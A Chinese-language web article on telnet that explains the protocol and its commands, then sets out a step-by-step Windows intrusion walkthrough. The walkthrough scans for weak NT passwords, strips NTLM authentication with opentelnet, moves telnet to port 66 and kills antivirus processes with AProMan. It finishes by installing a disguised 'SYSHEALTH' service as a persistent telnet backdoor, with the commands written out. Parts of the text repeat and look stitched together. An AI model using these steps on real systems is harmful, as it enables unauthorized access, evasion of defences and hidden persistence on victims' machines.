telnet是什么：telnet是一种协议，是TCP/IP网络通讯协议中的一种，提供网络远程登陆服务以及对应的相关协议标准。通过使用telnet程序可以使得本地计算机通过网络远程登陆服务器或网络计算机，象使用本地计算机一样方便的使用控制台，实现在本机就能远程控制网路计算机的目的。下面就是我整理的telnet命令使用方法详解_如何启用telnet命令，希望大家喜欢。 目 录什么是Telnet为什么需要Telnet打开Telnet的命令Telnet命令无法使用的解决方法什么是Telnet？对于Telnet的认识，不同的人持有不同的观点，可以把Telnet当成一种通信协议，但是对于入侵者而言，Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接，入侵者便可以使用目标主机上的软、硬件资源，而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。<<<为什么需要Telnet？telnet就是查看某个端口是否可访问。我们在搞开发的时候，经常要用的端口就是 8080。那么你可以启动服务器，用telnet 去查看这个端口是否可用。Telnet协议是TCP/IP协议家族中的一员，是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序，用它连接到服务器。终端使用者可以在telnet程序中输入命令，这些命令会在服务器上运行，就像直接在服务器的控制台上输入一样。可以在本地就能控制服务器。要开始一个telnet会话，必须输入用户名和密码来登录服务器。Telnet是常用的远程控制Web服务器的方法。<<<打开Telnet的命令点击“开始”菜单——>点击“运行”——>在运行中输入“telnet”，点击确定即可打开;telnet命令大全，命令可以缩写。支持的命令为：c - close 关闭当前链接d - display 显示操作参数o - open hostname [port] 链接到主机，hostname为主机名称、IP地址或网站域名，[port]为端口号，默认为23端口q - quit 退出telnet程序set - set 设置选项，如果需要帮助列表请键入set ?设置选项包括如下bsasdel Backspace 键作为删除crlf 新行模式-引起return键发送CR和LFdelasbs 发送Delete键作为退格escape x x是进入telnet客户端提示的escape字符localecho 打开localechologfile x x是当前客户的日志文件logging 打开loggingmode x x是控制台或流ntlm 打开NTLM身份验证term x x是ansi、vt100、vt52或vtntsen - send 将字符串发送到服务器st - status 显示状态信息u - unset 解除设置选项，如果需要帮助列表，请键入unset ?设置选项包括bsasdel 退格将被作为退格发送crlf 换行模式-使回车键发送CRdelasbs 删除将被作为删除发送escape 不用escape字符localecho 关闭localechologging 关闭记录ntlm 关闭NTLM身份验证?/h - help 显示帮助信息以上就是我为您整理的一部分telnet命令，这些都称之为远程计算机交互式命令，远程登陆是指用户使用telnet命令，使自己的计算机暂时成为远程主机的一个仿真终端的过程。仿真终端等效于一个非智能的机器，它只负责把用户输入的每个字符传递给主机，再将主机输出的每个信息回显在屏幕上。<<

1、什么是Telnet？ 对于Telnet的认识，不同的人持有不同的观点，可以把Telnet当成一种通信协议，但是对于入侵者而言，Telnet只是一种远程登录的工具。一旦入侵者与远程主机建立了Telnet连接，入侵者便可以使用目标主机上的软、硬件资源，而入侵者的本地机只相当于一个只有键盘和显示器的终端而已。2、Telnet被入侵者用来做什么(1)Telnet是控制主机的第一手段如果入侵者想要在远程主机上执行命令，需要建立IPC$连接，然后使用net time命令查看系统时间，最后使用at命令建立计划任务才能完成远程执行命令。虽然这种方法能够远程执行命令，但相比之下，Telnet方式对入侵者而言则会方便得多。入侵者一旦与远程主机建立Telnet连接，就可以像控制本地计算机一样来控制远程计算机。可见，Telnet方式是入侵者惯于使用的远程控制方式，当他们千方百计得到远程主机的管理员权限后，一般都会使用Telnet方式进行登录。(2)用来做跳板入侵者把用来隐身的肉鸡称之为“跳板”，他们经常用这种方法，从一个“肉鸡”登录到另一个“肉鸡”，这样在入侵过程中就不会暴露自己的IP地址。3.关于NTLM验证由于Telnet功能太强大，而且也是入侵者使用最频繁的登录手段之一，因此微软公司为Telnet添加了身份验证，称为NTLM验证，它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外，还需要满足NTLM验证关系。NTLM验证大大增强了Telnet主机的安全性，就像一只拦路虎把很多入侵者拒之门外。4、Telnet语法telnet [-a][-e escape char][-f log file][-l user][-t term][host [port]]-a 企图自动登录。除了用当前已登陆的用户名以外，与 -l 选项相同。-e 跳过字符来进入 telnet 客户提示。-f 客户端登录的文件名-l 指定远程系统上登录用的用户名称。要求远程系统支持 TELNET ENVIRON 选项。-t 指定终端类型。支持的终端类型仅是: vt100, vt52, ansi 和 vtnt。host 指定要连接的远程计算机的主机名或 IP 地址。port 指定端口号或服务名。5.使用Telnet登录登录命令：telnet HOST [PORT] 例如：telnet 61.152.158.132 23（默认端口）断开Telnet连接的命令：exit成功地建立Telnet连接，除了要求掌握远程计算机上的账号和密码外，还需要远程计算机已经开启“Telnet服务”，并去除NTLM验证。也可以使用专门的Telnet工具来进行连接，比如STERM，CTERM等工具。6.Telnet典型入侵（如果以下内容不太了解，可以简单了解）1.Telnet典型入侵步骤步骤一：建立IPC$连接。其中sysback是前面建立的后门账号。步骤二：开启远程主机中被禁用的Telnet服务。步骤三：断开IPC$连接。步骤四：去掉NTLM验证。如果没有去除远程计算机上的NTLM验证，在登录远程计算机的时候就会失败。不过入侵者会使用各种方法使NTLM验证形同虚设。解除NTLM的方法有很多，下面列出一些常用的方法，来看看入侵者如何去除NTLM验证。(1)方法一首先，在本地计算机上建立一个与远程主机上相同的账号和密码。然后，通过“开始”→“程序”→“附件”找到“命令提示符”，使用鼠标右键单击“命令提示符”，然后选择“属性”在“以其他用户身份运行(U)”前面“打钩”，然后单击“确定”按钮。接着，仍然按照上述路径找到“命令提示符”，用鼠标左键单击打开，得到如图所示对话框。如图所示，键入“用户名”和“密码”。单击“确定”按钮后，得到MS-DOS界面，然后用该MS-DOS进行Telnet登录。键入“telnet 192.168.27.128”命令并回车后，在得到的界面中键入“y”表示发送密码并登录，如图所示。最后得到就是远程主机为Telnet终端用户打开的Shell，在该Shell中输入的命令将会直接在远程计算机上执行。比如，键入“net user”命令来查看远程主机上的用户列表。(2)方法二该方法使用工具NTLM.EXE来去除NTLM验证。首先与远程主机建立IPC$连接，然后将NTLM.EXE拷贝至远程主机，最后通过at命令使远程计算机执行NTLM.EXE。计划任务执行NTLM.EXE后，便可键入“telnet 192.168.27.128”命令来登录远程计算机。最后得到登录界面在该登录界面中键入用户名和密码，如果用户名和密码正确，便会登录到远程计算 机，得到远程计算机的Shell。成功登录。另外，还可以使用与opentelnet.exe相配套的程序resumetelnet.exe来恢复远程主机的NTLM验证，命令格式为“ResumeTelnet.exe \server sername password”。执行后回显可知，resumetelnet.exe关闭了目标主机的Telnet服务，恢复了NTLM验证。Telnet高级入侵全攻略从前面的介绍可以看出，即使计算机使用了NTLM验证，入侵者还是能够轻松地去除NTLM验证来实现Telnet登录。如果入侵者使用23号端口登录，管理员便可以轻易地发现他们，但不幸的是，入侵者通常不会通过默认的23号端口进行Telnet连接。那么入侵者究竟如何修改Telnet端口，又如何修改Telnet服务来隐蔽行踪呢?下面举一些常见的例子来说明这一过程，并介绍一下完成这一过程所需要的工具。X-Scan：用来扫出存在NT弱口令的主机。opentelnet：用来去NTLM验证、开启Telnet服务、修改Telnet服务端口。AProMan：用来查看进程、杀死进程。instsrv：用来给主机安装服务。(1)AProMan简介AproMan以命令行方式查看进程、杀死进程，不会被杀毒软件查杀。举个例子，如果入侵者发现目标主机上运行有杀毒软件，会导致上传的工具被杀毒软件查杀，那么他们就会要在上传工具前关闭杀毒防火墙。使用方法如下：c:AProMan.exe -a 显示所有进程c:AProMan.exe -p 显示端口进程关联关系(需Administrator权限)c:AProMan.exe -t [PID] 杀掉指定进程号的进程c:AProMan.exe -f [FileName] 把进程及模块信息存入文件(2)instsrv简介instsrv是一款用命令行就可以安装、卸载服务的程序，可以自由指定服务名称和服务所执行的程序。instsrv的用法如下：安装服务：instsrv <服务名称> <执行程序的位置>卸载服务：instsrv <服务名称> REMOVE还有另一款优秀的远程服务管理工具SC。它属于命令行工具，可以在本地对远程计算机上的服务进行查询、启动、停止和删除。它的用法很简单，这里不作介绍了。下面通过实例来介绍入侵者如何实现Telnet登录并留下Telnet后门的过程。步骤一：扫出有NT弱口令的主机。在X-Scan的“扫描模块”中选中“NT-SERVER弱口令”。然后在“扫描参数中”指定扫描范围为“192.168.27.2到192.168.27.253”。等待一段时间后，得到扫描结果。步骤二：用opentelnet打开远程主机Telnet服务、修改目标主机端口、去除NTLM验证。无论远程主机是否开启“Telnet服务”，入侵者都可以通过工具opentelnet来解决。比如，通过“opentelnet \192.168.27.129 administrator "" 1 66”命令为IP地址为192.168. 27.129的主机去除NTLM认证，开启Telnet服务，同时又把Telnet默认的23号登录端口改成66号端口。步骤三：把所需文件(instsrv.exe、AProMan.exe)拷贝到远程主机。首先建立IPC$，然后通过映射网络硬盘的方法把所需文件拷贝、粘贴到远程计算机的c:winnt文件夹中。拷贝成功后。步骤四：Telnet登录。在MS-DOS中键入命令“telnet 192.168.27.129 66”来登录远程主机192.168.27.129。步骤五：杀死防火墙进程。如果入侵者需要把类似木马的程序拷贝到远程主机并执行，那么他们会事先关闭远程主机中的杀毒防火墙。虽然这里没有拷贝类似木马的程序到远程主机，但还是要介绍一下这一过程。当入侵者登录成功后，他们会进入到c:winnt目录中使用AProMan程序。首先通过命令 AProMan –A查看所有进程，然后找到杀毒防火墙进程的PID，最后使用AProMan –t [PID]来杀掉杀毒防火墙。步骤六：另外安装更为隐蔽的Telnet服务。为了事后仍然能登录到该计算机，入侵者在第一次登录之后都会留下后门。这里来介绍一下入侵者如何通过安装系统服务的方法来让Telnet服务永远运行。在安装服务之前，有必要了解一下Windows操作系统是如何提供“Telnet服务”的。打开“计算机管理”，然后查看“Telnet服务”属性。在“Telnet 的属性”窗口中，可以看到其中“可执行文件的路径”指向“C:WINNT SYSTEM32tlntsvr.exe”。可见，程序tlntsvr.exe就是Windows系统中专门用来提供“Telnet服务”的。也就是说，如果某服务指向该程序，那么该服务就会提供Telnet服务。因此，入侵者可以自定义一个新服务，将该服务指向tlntsvr.exe，从而通过该服务提供的Telnet服务登录，这样做后，即使远程主机上的Telnet服务是被禁用的，入侵者也可以毫无阻碍的登录到远程计算机，这种方法被称之为 Telnet后门。下面就介绍一下上述过程是如何实现的。首先进入instsrv所在目录。然后使用instsrv.exe建立一个名为“SYSHEALTH”的服务，并把这个服务指向C:WINNT zSYSTEM32tlntsvr.exe，根据instsrv.exe的用法，键入命令“instsrv.exe SYSHEALTH C:WINNTSYSTEM32tlntsvr.exe”。一个名为“SYSHEAHTH”的服务就这样建立成功了。虽然从表面看上去该服务与远程连接不存在任何关系，但是实际上该服务是入侵者留下的Telnet后门服务。通过“计算机管理”可以看到该服务已经添加在远程计算机上。入侵者一般会把这个服务的启动类型设置成“自动”，把原来的“Telnet服务”停止并禁用。 通过验证可知，虽然远程主机上的Telnet服务已经被停止并禁用，但入侵者仍然能够通过Telnet来控制远程主机。通过这些修改，即使管理员使用“netstat –n”命令来查看开放端口号也看不出66端口正在提供Telnet服务，此命令平常还可以拿来判断端口的连接情况。
Telnet语法 telnet [-a][-e escape char][-f log file][-l user][-t term][host [port]]-a 企图自动登录。除了用当前已登陆的用户名以外，与 -l 选项相同。-e 跳过字符来进入 telnet 客户提示。-f 客户端登录的文件名-l 指定远程系统上登录用的用户名称。要求远程系统支持 TELNET ENVIRON 选项。-t 指定终端类型。支持的终端类型仅是: vt100, vt52, ansi 和 vtnt。host 指定要连接的远程计算机的主机名或 IP 地址。 port 指定端口号或服务名。